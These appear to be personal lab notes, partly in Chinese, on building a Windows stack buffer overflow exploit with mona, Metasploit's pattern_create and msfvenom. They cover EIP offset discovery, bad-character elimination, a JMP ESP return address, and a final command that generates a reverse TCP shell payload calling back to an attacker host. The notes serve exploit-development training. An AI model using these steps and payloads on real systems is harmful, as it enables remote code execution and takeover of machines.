nc 10.10.16.52 1337

xfreerdp /u:admin /p:password /cert:ignore /v:10.10.16.52 /workarea

!mona config -set workingfolder c:\mona\%p

最大探测数：1800

生成指定长度不重复字节：（比fuzzing探测出来的字节长一点）
/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2000

EIP 356B4134


找到offiset

!mona findmsp -distance 2000

!mona bytearray -b "\x00"

生成字节码：

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()


ESP 0199FA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 0199FA30

POSSIBLY BAD CHARS: 1d,1e,2e,2f,c7,c8,ee,ef


!mona bytearray -b "\x00\x1d\x2e\xc7\xee"



ESP 01AAFA30

!mona compare -f C:\mona\oscp\bytearray.bin -a 01AAFA30


根据坏字节查找到可以利用的shellcode的静态地址
!mona jmp -r esp -cpb "\x00\x1d\x2e\xc7\xee"


找到静态地址：625011af

retn = "\xaf\x11\x50\x62"
padding = "\x90" * 16


生成shellcode:
msfvenom -p windows/shell_reverse_tcp LHOST=10.17.9.218 LPORT=4444 EXITFUNC=thread -b "\x00\x1d\x2e\xc7\xee" -f c